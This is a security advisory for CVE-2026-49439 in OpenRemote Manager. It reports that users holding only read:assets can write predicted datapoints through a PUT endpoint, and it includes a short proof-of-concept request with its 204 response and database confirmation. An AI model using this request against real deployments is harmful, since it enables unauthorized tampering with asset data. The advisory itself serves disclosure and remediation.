PT-2026-56050 · Maven · Io.Openremote:Openremote-Manager
Published
2026-07-06
·
Updated
2026-07-06
·
CVE-2026-49439
CVSS v3.1
4.3
Medium
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N |
Summary
The predicted datapoint write endpoint allows users with only
read:assets privileges to write predicted datapoints.The endpoint:
text
PUT /api/{realm}/asset/predicted/{assetId}/{attributeName}accepts write requests from users lacking
write:assets.The implementation appears to check
READ ASSETS while performing a write operation through:java
assetPredictedDatapointService.updateValues(...)PoC
A user was created with only:
text
read:assetsand without
write:assets.The following request succeeded:
http
PUT /api/master/asset/predicted/4Fr8Pcp7iDjrEmoSUFolvT/temperatureRequest body:
json
[{"x":1779199999001,"y":1337}]Response:
text
HTTP/2 204Database verification confirmed the datapoint was written successfully:
text
entity id: 4Fr8Pcp7iDjrEmoSUFolvT
attribute name: temperature
value: 1337Impact
Users with read-only asset permissions can modify predicted datapoints for assets.
Fix
Missing Authorization
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Io.Openremote:Openremote-Manager